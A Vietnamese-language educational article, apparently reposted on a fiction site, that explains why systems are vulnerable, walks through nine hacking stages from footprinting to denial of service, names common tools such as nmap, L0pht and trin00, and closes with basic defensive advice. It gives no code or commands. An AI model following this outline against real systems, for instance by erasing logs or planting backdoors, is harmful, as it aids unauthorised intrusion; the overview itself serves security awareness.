Những lỗi nảy sinh khi lập trình là một yếu tố làm cho ứng dụng vượt ra ngoài tầm kiểm soát của người sử dụng. Ví dụ như những lỗi của MS IIS hay trong ISC BIND hay SSH và rất nhiều lỗi khác nữa trong các hệ thống của Sun. Đơn gian hơn nữa là lỗi của OE mà bạn có thể trở thành mục tiêu của virus, hãy nhớ tới "I LOVE YOU" hay "Melissa".

Những nhà cung cấp thiếu trách nhiệm:

Rất nhiều nhà cung cấp không quan tâm đến điều gì xảy ra trong chượng trình của họ. Việc đảm bảo chất lượng (QA) trong ngành công nghiệp phần mềm rất yếu. Để tiết kiệm chi phí thì người ta thường không áp dụng những tiêu chuẩn về qui trình sản xuất. Thế thì ai phải chịu hậu quả của sự tối đầu của nhà cung cấp. Đó chính là các hệ thống mạng và máy tính bị phá hoại của bạn.

Trong trưòng hợp các bản sửa lỗi bị chậm trễ cũng có thể làm hại đến công tác bảo mật. Các khám phá lỗ hổng hoạt động với tốc độ "ánh sáng" trong giới “chúng ta” . Từ các mail list hay diễn đàn như www.hackervn.net thì bọn họ chia xẻ với nhau những thông tin mới nhất, trong khi đó với sự chậm chạp của nhà cung cấp thì các hệ thống đã bị phá hoại chỉ sau một đêm.

Tư vấn không đủ trình độ:

Nếu như tất cả các vấn đề ở trên đều đựơc giải quyết thì bạn doanh nghiệp lại vấp phải một vấn đề khác là thiếu những các nhân đáng tin tưởng. Có thể thu thập một đỗi ngũ kỹ sư, quản trị và lập trình viên đủ trình độ, nhưng không dễ tìm ra các chuyên gia bảo mật giỏi, vì có lẽ bọn họ đã đi làm hacker hết cả rồi!.

Và không thể đào tạo đội ngũ chuyên gia bảo mật trong vài ngày. Đó là một quá trình rất dài, phải bắt đầu từ các kiến thức cơ bản như TCP/IP, phần cứng, hệ điều hành, mã hoá và lập trình. Nhưng như vậy mới chỉ đủ cho các hiểu biết sơ đẳng về bảo mật.

Việc thiếu nhân sự làm cho các chương trình về bảo mật trong doanh nghiệp bị xao lãng hoặc đi sai đường. Không có các chính sách về bảo mật hoặc nếu có thì không được hoàn chỉnh. Chính điều đó làm cho hệ thống của bạn bị tổn thương trước các cuộc tấn công.

Vậy thì các hacker xâm nhập vào hệ thống như thế nào?

Có thể vài người muốn kiện tôi vì việc viết ra những tin này. Tại sao? Đơn giản là bởi vì những thông tin sẽ được đưa ra có thể đem đến nhiều tác hại hơn là ích lợi (but not for hackers). Tôi không nói rằng những thông tin đó không thể bị lợi dụng, nhưng chỉ những người muốn bảo vệ chính mình, họ sẽ tìm thấy những gì họ muốn. Những thông tin này có đầy rẫy trên web và tất cả hacker đều biết. Còn những người dùng bình thường thì không cần cố gắng để làm quen với chúng, vì chúng quá nguy hiểm. Bài viết chỉ đem đến cho họ một chút hiểu biết về những gì mà họ mong muốn.

Hacking có 9 bước đã được đề cập đến trong cuốn sách Hacking Exposed, bao gồm:

(chỗ này để đại tiếng Anh cho dễ hiểu)

FootPrinting

Scanning

Enumeration

Gaining Access

Escalating Privileges

Pilfering

Covering Tracks

Creating "Back Doors"

Denial of Service

1. FootPrinting:

Đây là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ/doanh nghiệp/người dùng. Nó bao gồm chi tiết về địa chỉ IP, Whois, DNS ..v.v đại khái là những thông tin chính thức có liên quan đến mục tiêu. Nhiều khi đơn giản hacker chỉ cần sử dụng các công cụ tìm kiếm trên mạng để tìm những thông tin đó.

Xem thêm tại đây

2. Scanning:

Khi đã có nhưng thông tin đó rồi, thì tiếp đến là đánh giá và định danh những những dịch vụ mà mục tiêu có. Việc này bao gồm quét cổng, xác định hệ điều hành, .v.v.. Các công cụ được sử dụng ở đây như nmap, WS pingPro, siphon, fscan và còn rất nhiều nữa.

3. Enumeration:

Bước thứ ba là tìm kiếm những tài nguyên được bảo vệ kém, hoạch tài khoản người dùng mà có thể sử dụng để xâm nhập. Nó bao gồm các mật khẩu mặc định, các script và dich vụ mặc định. Rât nhiều người quản trị mạng không biết đến hoặc không sửa đổi lại các giá trị này.

4. Gaining Access:

Bây giờ kẻ xâm nhập sẽ tìm cách truy cập vào mạng bằng những thông tin có đựơc ở ba bước trên. Phương pháp được sử dụng ở đây có thể là tấn công vào lỗi tràn bộ đệm ( xem thêm tại đây ), lấy và giả mã file password, hay thô thiển nhất là brute force (kiểm tra tất cả các trường hợp) password. Các tool thường được sử dụng ở bước này là NAT, podium, hoặc L0pht.

5. Escalating Privileges:

Ví dụ trong trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest, thì họ sẽ tìm cách kiểm soát toàn bộ hệ thống. Hacker sẽ tìm cách crack password của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền. John và Riper là hai chương trình crack password rất hay được sử dụng.

6. Pilfering:

Thêm một lần nữa các máy tìm kiếm lại đựơc sử dụng để tìm các phương pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn khác có thể là mồi ngon cho hacker.

7. Covering Tracks:

Sau khi đã có những thông tin cần thiết, hacker tìm cách xoá dấu vết, xoá các file log của hệ điều hành làm cho người quản lý không nhận ra hệ thống đã bị xâm nhập hoặc có biết cũng không tìm ra kẻ xâm nhập là ai.

8. Creating "Back Doors":

Hacker để lại "Back Doors", tức là một cơ chế cho phép hacker truy cập trở lại bằng con đường bí mật không phải tốn nhiều công sức, bằng việc cài đặt Trojan hay tạo user mới (đối với tổ chức có nhiều user). Công cụ ở đây là các loại Trojan, keylog…

9. Denial of Service (aka DoS):

Nếu không thành công trong việc xâm nhập, thì DoS là phương tiện cuối cùng để tấn công hệ thống. Nếu hệ thống không được cấu hình đúng cách, nó sẽ bị phá vỡ và cho phép hacker truy cập. Hoặc trong trường hợp khác thì DoS sẽ làm cho hệ thống không hoạt động được nữa. Các công cụ hay được sử dụng để tấn công DoS là trin00, Pong Of Death, teardrop, và các loại nuker, flooder.

Xem thêm tại đây

Vậy thì làm thế nào để tự bảo vệ?

Nếu bạn là người dùng cuối, bạn có thể hỏi như vậy. Đơn giản là vì không có gì 100% an toàn. Các lỗ hổng mới được tìm ra hàng ngày, các phương pháp mới cũng hình thành sau một đêm. Nhiều khi bạn nghĩ là an toàn, nhưng đến lúc nhận ra là bị xâm phạm thì đã muộn rồi.

Nhưng ở đây cũng có một vài hướng dẫn để bạn có thể tự bảo vệ mình:

Cài đặt firewall tốt và đảm bảo rằng nó được cấu hình chính xác.

Tắt tất cả các ứng dụng và dịch vụ của hệ thống mà bạn không sử dụng.

Không bao giờ mở những file đến từ người lạ.

Cài đặt các chương trinh diệt virus tốt và được cập nhật thường xuyên.

Cài đăt các bản sửa lỗi mới nhất và tham gia vào các hệ thống tin trực tuyến về bảo mật để thong tin được cập nhật kịp thời.

Có một chính sách bảo mật riêng cho mình.

Đảm bảo một hệ thống mạng tốt để tránh rủi ro.

Đầu tư các thiết bị phần cứng bảo mật tốt (money).

Sẽ không có một cuốn Kinh thánh nào về bảo mật cho bạn, tất cả chỉ là những chỉ dẫn phổ thông, nhưng đa phần người dung đã không để ý đến chúng và hâu quả là họ đã bị nguy hiểm. Không thể chống lại hack được nhưng có thể giảm thiểu được nó :P

Bảo mật không phải là câu chuyện vui. Không có bảo mật thì các máy tính nối mạng sẽ bị tàn phá, Nhũng lỗ hổng và các công cụ đã được thông báo thì nó sẽ không chỉ là thông báo, mà nó là điềm báo trước điều gì sẽ xảy ra.

Một vài lời khuyên:

Nếu bạn muốn học “Hack” thì còn phải đọc nhiều hơn nữa.

Hacking không chỉ là xâm nhập trái phép vào hệ thống máy tính. Nó còn hơn thế nữa. Nó là thách thức mà bạn phải trải qua. Nó không chỉ đơn giản như những ví dụ mà tôi đã đề cập đến.

Bất cứ điều gì về hacking mà bạn đọc được đều có thể được sử dụng với mục đích tốt hay xấu. Tôi khuyên bạn nên xác đinh được mục đích trước khi chạy thử một chương trinh hack nào đó. Trở thành một hacker giỏi cũng không phải là một điều xấu, mà ngược lại nó còn rất tốt vì nhiều lý do. Vì vậy bạn nên cố gắng giúp đỡ những người bạn gặp để trở thành một hacker tốt. Có rất nhiều người không có một khái niệm nào về sự xâm nhập từ bên ngoài vào máy tính của họ. 

Bạn đang đọc truyện trên: Truyen2U.Pro